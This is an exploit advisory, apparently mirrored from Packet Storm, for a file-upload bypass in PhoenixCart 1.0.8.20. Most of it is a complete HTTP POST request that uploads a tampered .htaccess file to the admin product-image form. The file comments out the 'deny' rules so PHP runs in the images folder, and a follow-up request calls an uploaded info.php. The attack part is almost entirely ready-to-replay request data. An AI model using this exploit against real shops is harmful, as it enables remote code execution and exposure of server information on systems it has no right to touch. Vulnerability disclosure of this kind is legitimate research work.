Share
## https://sploitus.com/exploit?id=PACKETSTORM:176078
## Title: PhoenixCart-1.0.8.20-File-Upload-Bypass-override-htaccess-security-RCE  
## Author: nu11secur1ty  
## Date: 12/06/2023  
## Vendor: https://phoenixcart.org/index.php  
## Software: https://github.com/CE-PhoenixCart/PhoenixCart/archive/master.zip  
## Reference: https://portswigger.net/web-security/file-upload,  
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload  
  
## Description:  
The Categories/Products Product Images upload function, is ABSOLUTELY  
NOT SANITIZING WELL for file uploading from any type of extension!  
In this case, you can see a bypassing of .HTACCESS SECURITY file and  
uploading an info.php exploit file which info.php can be executed from  
everywhere for dumping the all information about the server! This can  
be done on the demo server! Please do not do this! I am a Penetration  
Tester, not a stupid cracker, and that's why I downloaded it,  
installed it, and tested it!  
If you want to test it yourself please download it, install it, and test it!  
Thank you all!  
  
STATUS: HIGH-CRITICAL Vulnerability  
[+]Exploit execution:  
```POST  
POST /PhoenixCart/admin/catalog.php?cPath=&action=update_product&pID=10 HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 2952  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://pwnedhost7.com  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryeDPXR7DpYcn3eWA1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Referer: http://pwnedhost7.com/PhoenixCart/admin/catalog.php?cPath=&pID=10&action=new_product  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Cookie: cepcAdminID=ukrk3ssr0jd6iqsnn9ofuccmbt  
Connection: close  
  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="formid"  
  
733e378dc8154accdbfd80762cc385f48d5566560ac3b264db19393f9beb268e  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_date_added"  
  
2023-12-06 11:36:36  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_status"  
  
1  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_quantity"  
  
0  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_date_available"  
  
2023-12-14 00:00:00  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="manufacturers_id"  
  
  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_model"  
  
  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_tax_class_id"  
  
1  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_price"  
  
1000.0000  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_price_gross"  
  
1070  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_weight"  
  
1.00  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_gtin"  
  
00000000000001  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_name[1]"  
  
pwned  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_description[1]"  
  
pwned your services  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_url[1]"  
  
  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_title[1]"  
  
  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_description[1]"  
  
  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_keywords[1]"  
  
  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image"; filename=""  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image_large_1";  
filename=".htaccess"  
Content-Type: application/octet-stream  
  
# $Id$  
#  
# This is used to restrict access to this folder to anything other  
# than images  
  
# Prevents any script files from being accessed from the images folder  
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">  
<IfModule mod_authz_core.c>  
# Require all denied  
</IfModule>  
  
<IfModule !mod_authz_core.c>  
Order Deny,Allow  
# Deny from all  
Allow from all  
</IfModule>  
</FilesMatch>  
  
Options -Indexes  
  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image_htmlcontent_1"  
  
  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1--  
  
```  
  
[+]Response:  
```PHP  
GET /PhoenixCart/images/info.php HTTP/1.1  
Host: pwnedhost7.com  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CE-Phoenix/2023/PhoenixCart-1.0.8.20)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/12/phoenixcart-10820-file-upload-bypass.html)  
  
## Time spent:  
00:17:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>